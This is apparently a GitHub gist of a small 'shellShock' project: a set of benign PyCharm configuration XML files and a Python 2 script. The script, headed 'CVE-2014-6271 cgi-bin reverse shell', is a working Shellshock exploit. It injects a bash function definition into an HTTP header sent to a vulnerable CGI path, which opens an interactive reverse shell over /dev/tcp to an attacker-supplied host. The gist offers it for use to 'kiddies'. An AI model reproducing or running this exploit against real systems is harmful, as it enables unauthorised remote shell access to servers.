Created
September 29, 2014 17:25
-
-
Save MarkoSh/7801418210ff10daeb60 to your computer and use it in GitHub Desktop.
Some for kiddies
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<project version="4"> | |
<component name="Encoding" useUTFGuessing="true" native2AsciiForPropertiesFiles="false" /> | |
</project> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<project version="4"> | |
<component name="ProjectRootManager" version="2" project-jdk-name="Python 2.7.3 (/usr/bin/python)" project-jdk-type="Python SDK" /> | |
</project> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<project version="4"> | |
<component name="ProjectModuleManager"> | |
<modules> | |
<module fileurl="file://$PROJECT_DIR$/.idea/shellShock.iml" filepath="$PROJECT_DIR$/.idea/shellShock.iml" /> | |
</modules> | |
</component> | |
</project> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<component name="DependencyValidationManager"> | |
<state> | |
<option name="SKIP_IMPORT_STATEMENTS" value="false" /> | |
</state> | |
</component> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<module type="PYTHON_MODULE" version="4"> | |
<component name="NewModuleRootManager"> | |
<content url="file://$MODULE_DIR$" /> | |
<orderEntry type="inheritedJdk" /> | |
<orderEntry type="sourceFolder" forTests="false" /> | |
</component> | |
</module> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<project version="4"> | |
<component name="VcsDirectoryMappings"> | |
<mapping directory="" vcs="" /> | |
</component> | |
</project> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<project version="4"> | |
<component name="ChangeListManager"> | |
<option name="TRACKING_ENABLED" value="true" /> | |
<option name="SHOW_DIALOG" value="false" /> | |
<option name="HIGHLIGHT_CONFLICTS" value="true" /> | |
<option name="HIGHLIGHT_NON_ACTIVE_CHANGELIST" value="false" /> | |
<option name="LAST_RESOLUTION" value="IGNORE" /> | |
</component> | |
<component name="ChangesViewManager" flattened_view="true" show_ignored="false" /> | |
<component name="CreatePatchCommitExecutor"> | |
<option name="PATCH_PATH" value="" /> | |
</component> | |
<component name="DaemonCodeAnalyzer"> | |
<disable_hints /> | |
</component> | |
<component name="ProjectLevelVcsManager" settingsEditedManually="false"> | |
<OptionsSetting value="true" id="Add" /> | |
<OptionsSetting value="true" id="Remove" /> | |
<OptionsSetting value="true" id="Checkout" /> | |
<OptionsSetting value="true" id="Update" /> | |
<OptionsSetting value="true" id="Status" /> | |
<OptionsSetting value="true" id="Edit" /> | |
<ConfirmationsSetting value="0" id="Add" /> | |
<ConfirmationsSetting value="0" id="Remove" /> | |
</component> | |
<component name="ProjectReloadState"> | |
<option name="STATE" value="0" /> | |
</component> | |
<component name="PropertiesComponent"> | |
<property name="last_opened_file_path" value="$PROJECT_DIR$/../uploader" /> | |
</component> | |
<component name="RunManager"> | |
<list size="0" /> | |
</component> | |
<component name="ShelveChangesManager" show_recycled="false" /> | |
<component name="TaskManager"> | |
<task active="true" id="Default" summary="Default task" /> | |
<servers /> | |
</component> | |
<component name="VcsContentAnnotationSettings"> | |
<option name="myLimit" value="2678400000" /> | |
</component> | |
<component name="VcsManagerConfiguration"> | |
<option name="OFFER_MOVE_TO_ANOTHER_CHANGELIST_ON_PARTIAL_COMMIT" value="true" /> | |
<option name="CHECK_CODE_SMELLS_BEFORE_PROJECT_COMMIT" value="false" /> | |
<option name="CHECK_NEW_TODO" value="true" /> | |
<option name="myTodoPanelSettings"> | |
<value> | |
<are-packages-shown value="false" /> | |
<are-modules-shown value="false" /> | |
<flatten-packages value="false" /> | |
<is-autoscroll-to-source value="false" /> | |
</value> | |
</option> | |
<option name="PERFORM_UPDATE_IN_BACKGROUND" value="true" /> | |
<option name="PERFORM_COMMIT_IN_BACKGROUND" value="true" /> | |
<option name="PERFORM_EDIT_IN_BACKGROUND" value="true" /> | |
<option name="PERFORM_CHECKOUT_IN_BACKGROUND" value="true" /> | |
<option name="PERFORM_ADD_REMOVE_IN_BACKGROUND" value="true" /> | |
<option name="PERFORM_ROLLBACK_IN_BACKGROUND" value="false" /> | |
<option name="CHECK_LOCALLY_CHANGED_CONFLICTS_IN_BACKGROUND" value="false" /> | |
<option name="CHANGED_ON_SERVER_INTERVAL" value="60" /> | |
<option name="SHOW_ONLY_CHANGED_IN_SELECTION_DIFF" value="true" /> | |
<option name="CHECK_COMMIT_MESSAGE_SPELLING" value="true" /> | |
<option name="DEFAULT_PATCH_EXTENSION" value="patch" /> | |
<option name="SHORT_DIFF_HORIZONTALLY" value="true" /> | |
<option name="SHORT_DIFF_EXTRA_LINES" value="2" /> | |
<option name="SOFT_WRAPS_IN_SHORT_DIFF" value="true" /> | |
<option name="INCLUDE_TEXT_INTO_PATCH" value="false" /> | |
<option name="INCLUDE_TEXT_INTO_SHELF" value="false" /> | |
<option name="SHOW_FILE_HISTORY_DETAILS" value="true" /> | |
<option name="SHOW_VCS_ERROR_NOTIFICATIONS" value="true" /> | |
<option name="SHOW_DIRTY_RECURSIVELY" value="false" /> | |
<option name="LIMIT_HISTORY" value="true" /> | |
<option name="MAXIMUM_HISTORY_ROWS" value="1000" /> | |
<option name="UPDATE_FILTER_SCOPE_NAME" /> | |
<option name="USE_COMMIT_MESSAGE_MARGIN" value="false" /> | |
<option name="COMMIT_MESSAGE_MARGIN_SIZE" value="72" /> | |
<option name="WRAP_WHEN_TYPING_REACHES_RIGHT_MARGIN" value="false" /> | |
<option name="FORCE_NON_EMPTY_COMMENT" value="false" /> | |
<option name="CLEAR_INITIAL_COMMIT_MESSAGE" value="false" /> | |
<option name="LAST_COMMIT_MESSAGE" /> | |
<option name="MAKE_NEW_CHANGELIST_ACTIVE" value="false" /> | |
<option name="OPTIMIZE_IMPORTS_BEFORE_PROJECT_COMMIT" value="false" /> | |
<option name="CHECK_FILES_UP_TO_DATE_BEFORE_COMMIT" value="false" /> | |
<option name="REFORMAT_BEFORE_PROJECT_COMMIT" value="false" /> | |
<option name="REFORMAT_BEFORE_FILE_COMMIT" value="false" /> | |
<option name="FILE_HISTORY_DIALOG_COMMENTS_SPLITTER_PROPORTION" value="0.8" /> | |
<option name="FILE_HISTORY_DIALOG_SPLITTER_PROPORTION" value="0.5" /> | |
<option name="ACTIVE_VCS_NAME" /> | |
<option name="UPDATE_GROUP_BY_PACKAGES" value="false" /> | |
<option name="UPDATE_GROUP_BY_CHANGELIST" value="false" /> | |
<option name="UPDATE_FILTER_BY_SCOPE" value="false" /> | |
<option name="SHOW_FILE_HISTORY_AS_TREE" value="false" /> | |
<option name="FILE_HISTORY_SPLITTER_PROPORTION" value="0.6" /> | |
</component> | |
<component name="XDebuggerManager"> | |
<breakpoint-manager /> | |
</component> | |
</project> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# | |
#CVE-2014-6271 cgi-bin reverse shell | |
# | |
import httplib,urllib,sys | |
if (len(sys.argv)<4): | |
print "Welcome, my little kiddy..." | |
print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0] | |
print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0] | |
exit(0) | |
conn = httplib.HTTPConnection(sys.argv[1]) | |
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3] | |
headers = {"Content-type": "application/x-www-form-urlencoded", | |
"test":reverse_shell } | |
conn.request("GET",sys.argv[2],headers=headers) | |
res = conn.getresponse() | |
print res.status, res.reason | |
data = res.read() | |
print data |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment